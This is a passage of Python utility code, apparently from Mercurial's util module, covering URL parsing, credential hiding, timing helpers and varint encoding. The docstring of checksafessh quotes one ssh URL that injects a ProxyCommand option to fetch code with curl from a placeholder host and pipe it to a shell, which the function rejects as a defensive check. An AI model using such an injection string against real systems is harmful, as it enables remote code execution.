2643 2643 its escaping.
2644 2644 """
2645 2645 fn = fn or (lambda s: s)
2646 2646 patterns = '|'.join(mapping.keys())
2647 2647 if escape_prefix:
2648 2648 patterns += '|' + prefix
2649 2649 if len(prefix) > 1:
2650 2650 prefix_char = prefix[1:]
2651 2651 else:
2652 2652 prefix_char = prefix
2653 2653 mapping[prefix_char] = prefix_char
2654 2654 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2655 2655 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2656 2656
2657 2657 def getport(port):
2658 2658 """Return the port for a given network service.
2659 2659
2660 2660 If port is an integer, it's returned as is. If it's a string, it's
2661 2661 looked up using socket.getservbyname(). If there's no matching
2662 2662 service, error.Abort is raised.
2663 2663 """
2664 2664 try:
2665 2665 return int(port)
2666 2666 except ValueError:
2667 2667 pass
2668 2668
2669 2669 try:
2670 2670 return socket.getservbyname(pycompat.sysstr(port))
2671 2671 except socket.error:
2672 2672 raise error.Abort(_("no port number associated with service '%s'")
2673 2673 % port)
2674 2674
2675 2675 class url(object):
2676 2676 r"""Reliable URL parser.
2677 2677
2678 2678 This parses URLs and provides attributes for the following
2679 2679 components:
2680 2680
2681 2681 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2682 2682
2683 2683 Missing components are set to None. The only exception is
2684 2684 fragment, which is set to '' if present but empty.
2685 2685
2686 2686 If parsefragment is False, fragment is included in query. If
2687 2687 parsequery is False, query is included in path. If both are
2688 2688 False, both fragment and query are included in path.
2689 2689
2690 2690 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2691 2691
2692 2692 Note that for backward compatibility reasons, bundle URLs do not
2693 2693 take host names. That means 'bundle://../' has a path of '../'.
2694 2694
2695 2695 Examples:
2696 2696
2697 2697 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2698 2698 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2699 2699 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2700 2700 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2701 2701 >>> url(b'file:///home/joe/repo')
2702 2702 <url scheme: 'file', path: '/home/joe/repo'>
2703 2703 >>> url(b'file:///c:/temp/foo/')
2704 2704 <url scheme: 'file', path: 'c:/temp/foo/'>
2705 2705 >>> url(b'bundle:foo')
2706 2706 <url scheme: 'bundle', path: 'foo'>
2707 2707 >>> url(b'bundle://../foo')
2708 2708 <url scheme: 'bundle', path: '../foo'>
2709 2709 >>> url(br'c:\foo\bar')
2710 2710 <url path: 'c:\\foo\\bar'>
2711 2711 >>> url(br'\\blah\blah\blah')
2712 2712 <url path: '\\\\blah\\blah\\blah'>
2713 2713 >>> url(br'\\blah\blah\blah#baz')
2714 2714 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2715 2715 >>> url(br'file:///C:\users\me')
2716 2716 <url scheme: 'file', path: 'C:\\users\\me'>
2717 2717
2718 2718 Authentication credentials:
2719 2719
2720 2720 >>> url(b'ssh://joe:xyz@x/repo')
2721 2721 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2722 2722 >>> url(b'ssh://joe@x/repo')
2723 2723 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2724 2724
2725 2725 Query strings and fragments:
2726 2726
2727 2727 >>> url(b'http://host/a?b#c')
2728 2728 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2729 2729 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2730 2730 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2731 2731
2732 2732 Empty path:
2733 2733
2734 2734 >>> url(b'')
2735 2735 <url path: ''>
2736 2736 >>> url(b'#a')
2737 2737 <url path: '', fragment: 'a'>
2738 2738 >>> url(b'http://host/')
2739 2739 <url scheme: 'http', host: 'host', path: ''>
2740 2740 >>> url(b'http://host/#a')
2741 2741 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2742 2742
2743 2743 Only scheme:
2744 2744
2745 2745 >>> url(b'http:')
2746 2746 <url scheme: 'http'>
2747 2747 """
2748 2748
2749 2749 _safechars = "!~*'()+"
2750 2750 _safepchars = "/!~*'()+:\\"
2751 2751 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2752 2752
2753 2753 def __init__(self, path, parsequery=True, parsefragment=True):
2754 2754 # We slowly chomp away at path until we have only the path left
2755 2755 self.scheme = self.user = self.passwd = self.host = None
2756 2756 self.port = self.path = self.query = self.fragment = None
2757 2757 self._localpath = True
2758 2758 self._hostport = ''
2759 2759 self._origpath = path
2760 2760
2761 2761 if parsefragment and '#' in path:
2762 2762 path, self.fragment = path.split('#', 1)
2763 2763
2764 2764 # special case for Windows drive letters and UNC paths
2765 2765 if hasdriveletter(path) or path.startswith('\\\\'):
2766 2766 self.path = path
2767 2767 return
2768 2768
2769 2769 # For compatibility reasons, we can't handle bundle paths as
2770 2770 # normal URLS
2771 2771 if path.startswith('bundle:'):
2772 2772 self.scheme = 'bundle'
2773 2773 path = path[7:]
2774 2774 if path.startswith('//'):
2775 2775 path = path[2:]
2776 2776 self.path = path
2777 2777 return
2778 2778
2779 2779 if self._matchscheme(path):
2780 2780 parts = path.split(':', 1)
2781 2781 if parts[0]:
2782 2782 self.scheme, path = parts
2783 2783 self._localpath = False
2784 2784
2785 2785 if not path:
2786 2786 path = None
2787 2787 if self._localpath:
2788 2788 self.path = ''
2789 2789 return
2790 2790 else:
2791 2791 if self._localpath:
2792 2792 self.path = path
2793 2793 return
2794 2794
2795 2795 if parsequery and '?' in path:
2796 2796 path, self.query = path.split('?', 1)
2797 2797 if not path:
2798 2798 path = None
2799 2799 if not self.query:
2800 2800 self.query = None
2801 2801
2802 2802 # // is required to specify a host/authority
2803 2803 if path and path.startswith('//'):
2804 2804 parts = path[2:].split('/', 1)
2805 2805 if len(parts) > 1:
2806 2806 self.host, path = parts
2807 2807 else:
2808 2808 self.host = parts[0]
2809 2809 path = None
2810 2810 if not self.host:
2811 2811 self.host = None
2812 2812 # path of file:///d is /d
2813 2813 # path of file:///d:/ is d:/, not /d:/
2814 2814 if path and not hasdriveletter(path):
2815 2815 path = '/' + path
2816 2816
2817 2817 if self.host and '@' in self.host:
2818 2818 self.user, self.host = self.host.rsplit('@', 1)
2819 2819 if ':' in self.user:
2820 2820 self.user, self.passwd = self.user.split(':', 1)
2821 2821 if not self.host:
2822 2822 self.host = None
2823 2823
2824 2824 # Don't split on colons in IPv6 addresses without ports
2825 2825 if (self.host and ':' in self.host and
2826 2826 not (self.host.startswith('[') and self.host.endswith(']'))):
2827 2827 self._hostport = self.host
2828 2828 self.host, self.port = self.host.rsplit(':', 1)
2829 2829 if not self.host:
2830 2830 self.host = None
2831 2831
2832 2832 if (self.host and self.scheme == 'file' and
2833 2833 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2834 2834 raise error.Abort(_('file:// URLs can only refer to localhost'))
2835 2835
2836 2836 self.path = path
2837 2837
2838 2838 # leave the query string escaped
2839 2839 for a in ('user', 'passwd', 'host', 'port',
2840 2840 'path', 'fragment'):
2841 2841 v = getattr(self, a)
2842 2842 if v is not None:
2843 2843 setattr(self, a, urlreq.unquote(v))
2844 2844
2845 2845 @encoding.strmethod
2846 2846 def __repr__(self):
2847 2847 attrs = []
2848 2848 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2849 2849 'query', 'fragment'):
2850 2850 v = getattr(self, a)
2851 2851 if v is not None:
2852 2852 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2853 2853 return '<url %s>' % ', '.join(attrs)
2854 2854
2855 2855 def __bytes__(self):
2856 2856 r"""Join the URL's components back into a URL string.
2857 2857
2858 2858 Examples:
2859 2859
2860 2860 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2861 2861 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2862 2862 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2863 2863 'http://user:pw@host:80/?foo=bar&baz=42'
2864 2864 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2865 2865 'http://user:pw@host:80/?foo=bar%3dbaz'
2866 2866 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2867 2867 'ssh://user:pw@[::1]:2200//home/joe#'
2868 2868 >>> bytes(url(b'http://localhost:80//'))
2869 2869 'http://localhost:80//'
2870 2870 >>> bytes(url(b'http://localhost:80/'))
2871 2871 'http://localhost:80/'
2872 2872 >>> bytes(url(b'http://localhost:80'))
2873 2873 'http://localhost:80/'
2874 2874 >>> bytes(url(b'bundle:foo'))
2875 2875 'bundle:foo'
2876 2876 >>> bytes(url(b'bundle://../foo'))
2877 2877 'bundle:../foo'
2878 2878 >>> bytes(url(b'path'))
2879 2879 'path'
2880 2880 >>> bytes(url(b'file:///tmp/foo/bar'))
2881 2881 'file:///tmp/foo/bar'
2882 2882 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2883 2883 'file:///c:/tmp/foo/bar'
2884 2884 >>> print(url(br'bundle:foo\bar'))
2885 2885 bundle:foo\bar
2886 2886 >>> print(url(br'file:///D:\data\hg'))
2887 2887 file:///D:\data\hg
2888 2888 """
2889 2889 if self._localpath:
2890 2890 s = self.path
2891 2891 if self.scheme == 'bundle':
2892 2892 s = 'bundle:' + s
2893 2893 if self.fragment:
2894 2894 s += '#' + self.fragment
2895 2895 return s
2896 2896
2897 2897 s = self.scheme + ':'
2898 2898 if self.user or self.passwd or self.host:
2899 2899 s += '//'
2900 2900 elif self.scheme and (not self.path or self.path.startswith('/')
2901 2901 or hasdriveletter(self.path)):
2902 2902 s += '//'
2903 2903 if hasdriveletter(self.path):
2904 2904 s += '/'
2905 2905 if self.user:
2906 2906 s += urlreq.quote(self.user, safe=self._safechars)
2907 2907 if self.passwd:
2908 2908 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2909 2909 if self.user or self.passwd:
2910 2910 s += '@'
2911 2911 if self.host:
2912 2912 if not (self.host.startswith('[') and self.host.endswith(']')):
2913 2913 s += urlreq.quote(self.host)
2914 2914 else:
2915 2915 s += self.host
2916 2916 if self.port:
2917 2917 s += ':' + urlreq.quote(self.port)
2918 2918 if self.host:
2919 2919 s += '/'
2920 2920 if self.path:
2921 2921 # TODO: similar to the query string, we should not unescape the
2922 2922 # path when we store it, the path might contain '%2f' = '/',
2923 2923 # which we should *not* escape.
2924 2924 s += urlreq.quote(self.path, safe=self._safepchars)
2925 2925 if self.query:
2926 2926 # we store the query in escaped form.
2927 2927 s += '?' + self.query
2928 2928 if self.fragment is not None:
2929 2929 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2930 2930 return s
2931 2931
2932 2932 __str__ = encoding.strmethod(__bytes__)
2933 2933
2934 2934 def authinfo(self):
2935 2935 user, passwd = self.user, self.passwd
2936 2936 try:
2937 2937 self.user, self.passwd = None, None
2938 2938 s = bytes(self)
2939 2939 finally:
2940 2940 self.user, self.passwd = user, passwd
2941 2941 if not self.user:
2942 2942 return (s, None)
2943 2943 # authinfo[1] is passed to urllib2 password manager, and its
2944 2944 # URIs must not contain credentials. The host is passed in the
2945 2945 # URIs list because Python < 2.4.3 uses only that to search for
2946 2946 # a password.
2947 2947 return (s, (None, (s, self.host),
2948 2948 self.user, self.passwd or ''))
2949 2949
2950 2950 def isabs(self):
2951 2951 if self.scheme and self.scheme != 'file':
2952 2952 return True # remote URL
2953 2953 if hasdriveletter(self.path):
2954 2954 return True # absolute for our purposes - can't be joined()
2955 2955 if self.path.startswith(br'\\'):
2956 2956 return True # Windows UNC path
2957 2957 if self.path.startswith('/'):
2958 2958 return True # POSIX-style
2959 2959 return False
2960 2960
2961 2961 def localpath(self):
2962 2962 if self.scheme == 'file' or self.scheme == 'bundle':
2963 2963 path = self.path or '/'
2964 2964 # For Windows, we need to promote hosts containing drive
2965 2965 # letters to paths with drive letters.
2966 2966 if hasdriveletter(self._hostport):
2967 2967 path = self._hostport + '/' + self.path
2968 2968 elif (self.host is not None and self.path
2969 2969 and not hasdriveletter(path)):
2970 2970 path = '/' + path
2971 2971 return path
2972 2972 return self._origpath
2973 2973
2974 2974 def islocal(self):
2975 2975 '''whether localpath will return something that posixfile can open'''
2976 2976 return (not self.scheme or self.scheme == 'file'
2977 2977 or self.scheme == 'bundle')
2978 2978
2979 2979 def hasscheme(path):
2980 2980 return bool(url(path).scheme)
2981 2981
2982 2982 def hasdriveletter(path):
2983 2983 return path and path[1:2] == ':' and path[0:1].isalpha()
2984 2984
2985 2985 def urllocalpath(path):
2986 2986 return url(path, parsequery=False, parsefragment=False).localpath()
2987 2987
2988 2988 def checksafessh(path):
2989 2989 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2990 2990
2991 2991 This is a sanity check for ssh urls. ssh will parse the first item as
2992 2992 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2993 2993 Let's prevent these potentially exploited urls entirely and warn the
2994 2994 user.
2995 2995
2996 2996 Raises an error.Abort when the url is unsafe.
2997 2997 """
2998 2998 path = urlreq.unquote(path)
2999 2999 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3000 3000 raise error.Abort(_('potentially unsafe url: %r') %
3001 3001 (pycompat.bytestr(path),))
3002 3002
3003 3003 def hidepassword(u):
3004 3004 '''hide user credential in a url string'''
3005 3005 u = url(u)
3006 3006 if u.passwd:
3007 3007 u.passwd = '***'
3008 3008 return bytes(u)
3009 3009
3010 3010 def removeauth(u):
3011 3011 '''remove all authentication information from a url string'''
3012 3012 u = url(u)
3013 3013 u.user = u.passwd = None
3014 3014 return bytes(u)
3015 3015
3016 3016 timecount = unitcountfn(
3017 3017 (1, 1e3, _('%.0f s')),
3018 3018 (100, 1, _('%.1f s')),
3019 3019 (10, 1, _('%.2f s')),
3020 3020 (1, 1, _('%.3f s')),
3021 3021 (100, 0.001, _('%.1f ms')),
3022 3022 (10, 0.001, _('%.2f ms')),
3023 3023 (1, 0.001, _('%.3f ms')),
3024 3024 (100, 0.000001, _('%.1f us')),
3025 3025 (10, 0.000001, _('%.2f us')),
3026 3026 (1, 0.000001, _('%.3f us')),
3027 3027 (100, 0.000000001, _('%.1f ns')),
3028 3028 (10, 0.000000001, _('%.2f ns')),
3029 3029 (1, 0.000000001, _('%.3f ns')),
3030 3030 )
3031 3031
3032 3032 @attr.s
3033 3033 class timedcmstats(object):
3034 3034 """Stats information produced by the timedcm context manager on entering."""
3035 3035
3036 3036 # the starting value of the timer as a float (meaning and resulution is
3037 3037 # platform dependent, see util.timer)
3038 3038 start = attr.ib(default=attr.Factory(lambda: timer()))
3039 3039 # the number of seconds as a floating point value; starts at 0, updated when
3040 3040 # the context is exited.
3041 3041 elapsed = attr.ib(default=0)
3042 3042 # the number of nested timedcm context managers.
3043 3043 level = attr.ib(default=1)
3044 3044
3045 3045 def __bytes__(self):
3046 3046 return timecount(self.elapsed) if self.elapsed else '<unknown>'
3047 3047
3048 3048 __str__ = encoding.strmethod(__bytes__)
3049 3049
3050 3050 @contextlib.contextmanager
3051 3051 def timedcm(whencefmt, *whenceargs):
3052 3052 """A context manager that produces timing information for a given context.
3053 3053
3054 3054 On entering a timedcmstats instance is produced.
3055 3055
3056 3056 This context manager is reentrant.
3057 3057
3058 3058 """
3059 3059 # track nested context managers
3060 3060 timedcm._nested += 1
3061 3061 timing_stats = timedcmstats(level=timedcm._nested)
3062 3062 try:
3063 3063 with tracing.log(whencefmt, *whenceargs):
3064 3064 yield timing_stats
3065 3065 finally:
3066 3066 timing_stats.elapsed = timer() - timing_stats.start
3067 3067 timedcm._nested -= 1
3068 3068
3069 3069 timedcm._nested = 0
3070 3070
3071 3071 def timed(func):
3072 3072 '''Report the execution time of a function call to stderr.
3073 3073
3074 3074 During development, use as a decorator when you need to measure
3075 3075 the cost of a function, e.g. as follows:
3076 3076
3077 3077 @util.timed
3078 3078 def foo(a, b, c):
3079 3079 pass
3080 3080 '''
3081 3081
3082 3082 def wrapper(*args, **kwargs):
3083 3083 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3084 3084 result = func(*args, **kwargs)
3085 3085 stderr = procutil.stderr
3086 3086 stderr.write('%s%s: %s\n' % (
3087 3087 ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
3088 3088 time_stats))
3089 3089 return result
3090 3090 return wrapper
3091 3091
3092 3092 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3093 3093 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3094 3094
3095 3095 def sizetoint(s):
3096 3096 '''Convert a space specifier to a byte count.
3097 3097
3098 3098 >>> sizetoint(b'30')
3099 3099 30
3100 3100 >>> sizetoint(b'2.2kb')
3101 3101 2252
3102 3102 >>> sizetoint(b'6M')
3103 3103 6291456
3104 3104 '''
3105 3105 t = s.strip().lower()
3106 3106 try:
3107 3107 for k, u in _sizeunits:
3108 3108 if t.endswith(k):
3109 3109 return int(float(t[:-len(k)]) * u)
3110 3110 return int(t)
3111 3111 except ValueError:
3112 3112 raise error.ParseError(_("couldn't parse size: %s") % s)
3113 3113
3114 3114 class hooks(object):
3115 3115 '''A collection of hook functions that can be used to extend a
3116 3116 function's behavior. Hooks are called in lexicographic order,
3117 3117 based on the names of their sources.'''
3118 3118
3119 3119 def __init__(self):
3120 3120 self._hooks = []
3121 3121
3122 3122 def add(self, source, hook):
3123 3123 self._hooks.append((source, hook))
3124 3124
3125 3125 def __call__(self, *args):
3126 3126 self._hooks.sort(key=lambda x: x[0])
3127 3127 results = []
3128 3128 for source, hook in self._hooks:
3129 3129 results.append(hook(*args))
3130 3130 return results
3131 3131
3132 3132 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3133 3133 '''Yields lines for a nicely formatted stacktrace.
3134 3134 Skips the 'skip' last entries, then return the last 'depth' entries.
3135 3135 Each file+linenumber is formatted according to fileline.
3136 3136 Each line is formatted according to line.
3137 3137 If line is None, it yields:
3138 3138 length of longest filepath+line number,
3139 3139 filepath+linenumber,
3140 3140 function
3141 3141
3142 3142 Not be used in production code but very convenient while developing.
3143 3143 '''
3144 3144 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3145 3145 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3146 3146 ][-depth:]
3147 3147 if entries:
3148 3148 fnmax = max(len(entry[0]) for entry in entries)
3149 3149 for fnln, func in entries:
3150 3150 if line is None:
3151 3151 yield (fnmax, fnln, func)
3152 3152 else:
3153 3153 yield line % (fnmax, fnln, func)
3154 3154
3155 3155 def debugstacktrace(msg='stacktrace', skip=0,
3156 3156 f=procutil.stderr, otherf=procutil.stdout, depth=0):
3157 3157 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3158 3158 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3159 3159 By default it will flush stdout first.
3160 3160 It can be used everywhere and intentionally does not require an ui object.
3161 3161 Not be used in production code but very convenient while developing.
3162 3162 '''
3163 3163 if otherf:
3164 3164 otherf.flush()
3165 3165 f.write('%s at:\n' % msg.rstrip())
3166 3166 for line in getstackframes(skip + 1, depth=depth):
3167 3167 f.write(line)
3168 3168 f.flush()
3169 3169
3170 3170 class dirs(object):
3171 3171 '''a multiset of directory names from a dirstate or manifest'''
3172 3172
3173 3173 def __init__(self, map, skip=None):
3174 3174 self._dirs = {}
3175 3175 addpath = self.addpath
3176 3176 if isinstance(map, dict) and skip is not None:
3177 3177 for f, s in map.iteritems():
3178 3178 if s[0] != skip:
3179 3179 addpath(f)
3180 3180 elif skip is not None:
3181 3181 raise error.ProgrammingError("skip character is only supported "
3182 3182 "with a dict source")
3183 3183 else:
3184 3184 for f in map:
3185 3185 addpath(f)
3186 3186
3187 3187 def addpath(self, path):
3188 3188 dirs = self._dirs
3189 3189 for base in finddirs(path):
3190 3190 if base in dirs:
3191 3191 dirs[base] += 1
3192 3192 return
3193 3193 dirs[base] = 1
3194 3194
3195 3195 def delpath(self, path):
3196 3196 dirs = self._dirs
3197 3197 for base in finddirs(path):
3198 3198 if dirs[base] > 1:
3199 3199 dirs[base] -= 1
3200 3200 return
3201 3201 del dirs[base]
3202 3202
3203 3203 def __iter__(self):
3204 3204 return iter(self._dirs)
3205 3205
3206 3206 def __contains__(self, d):
3207 3207 return d in self._dirs
3208 3208
3209 3209 if safehasattr(parsers, 'dirs'):
3210 3210 dirs = parsers.dirs
3211 3211
3212 3212 if rustdirs is not None:
3213 3213 dirs = rustdirs
3214 3214
3215 3215 def finddirs(path):
3216 3216 pos = path.rfind('/')
3217 3217 while pos != -1:
3218 3218 yield path[:pos]
3219 3219 pos = path.rfind('/', 0, pos)
3220 3220 yield ''
3221 3221
3222 3222
3223 3223 # convenient shortcut
3224 3224 dst = debugstacktrace
3225 3225
3226 3226 def safename(f, tag, ctx, others=None):
3227 3227 """
3228 3228 Generate a name that it is safe to rename f to in the given context.
3229 3229
3230 3230 f: filename to rename
3231 3231 tag: a string tag that will be included in the new name
3232 3232 ctx: a context, in which the new name must not exist
3233 3233 others: a set of other filenames that the new name must not be in
3234 3234
3235 3235 Returns a file name of the form oldname~tag[~number] which does not exist
3236 3236 in the provided context and is not in the set of other names.
3237 3237 """
3238 3238 if others is None:
3239 3239 others = set()
3240 3240
3241 3241 fn = '%s~%s' % (f, tag)
3242 3242 if fn not in ctx and fn not in others:
3243 3243 return fn
3244 3244 for n in itertools.count(1):
3245 3245 fn = '%s~%s~%s' % (f, tag, n)
3246 3246 if fn not in ctx and fn not in others:
3247 3247 return fn
3248 3248
3249 3249 def readexactly(stream, n):
3250 3250 '''read n bytes from stream.read and abort if less was available'''
3251 3251 s = stream.read(n)
3252 3252 if len(s) < n:
3253 3253 raise error.Abort(_("stream ended unexpectedly"
3254 3254 " (got %d bytes, expected %d)")
3255 3255 % (len(s), n))
3256 3256 return s
3257 3257
3258 3258 def uvarintencode(value):
3259 3259 """Encode an unsigned integer value to a varint.
3260 3260
3261 3261 A varint is a variable length integer of 1 or more bytes. Each byte
3262 3262 except the last has the most significant bit set. The lower 7 bits of
3263 3263 each byte store the 2's complement representation, least significant group
3264 3264 first.
3265 3265
3266 3266 >>> uvarintencode(0)
3267 3267 '\\x00'
3268 3268 >>> uvarintencode(1)
3269 3269 '\\x01'
3270 3270 >>> uvarintencode(127)
3271 3271 '\\x7f'
3272 3272 >>> uvarintencode(1337)
3273 3273 '\\xb9\\n'
3274 3274 >>> uvarintencode(65536)
3275 3275 '\\x80\\x80\\x04'
3276 3276 >>> uvarintencode(-1)
3277 3277 Traceback (most recent call last):
3278 3278 ...
3279 3279 ProgrammingError: negative value for uvarint: -1
3280 3280 """
3281 3281 if value < 0:
3282 3282 raise error.ProgrammingError('negative value for uvarint: %d'
3283 3283 % value)
3284 3284 bits = value & 0x7f
3285 3285 value >>= 7
3286 3286 bytes = []
3287 3287 while value:
3288 3288 bytes.append(pycompat.bytechr(0x80 | bits))
3289 3289 bits = value & 0x7f
3290 3290 value >>= 7
3291 3291 bytes.append(pycompat.bytechr(bits))
3292 3292
3293 3293 return ''.join(bytes)
3294 3294
3295 3295 def uvarintdecodestream(fh):
3296 3296 """Decode an unsigned variable length integer from a stream.
3297 3297
3298 3298 The passed argument is anything that has a ``.read(N)`` method.
3299 3299
3300 3300 >>> try:
3301 3301 ... from StringIO import StringIO as BytesIO
3302 3302 ... except ImportError:
3303 3303 ... from io import BytesIO
3304 3304 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3305 3305 0
3306 3306 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3307 3307 1
3308 3308 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3309 3309 127
3310 3310 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3311 3311 1337
3312 3312 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3313 3313 65536
3314 3314 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3315 3315 Traceback (most recent call last):
3316 3316 ...
3317 3317 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3318 3318 """
3319 3319 result = 0
3320 3320 shift = 0
3321 3321 while True:
3322 3322 byte = ord(readexactly(fh, 1))
3323 3323 result |= ((byte & 0x7f) << shift)
3324 3324 if not (byte & 0x80):
3325 3325 return result
3326 3326 shift += 7
General Comments 0
You need to be logged in to leave comments. Login now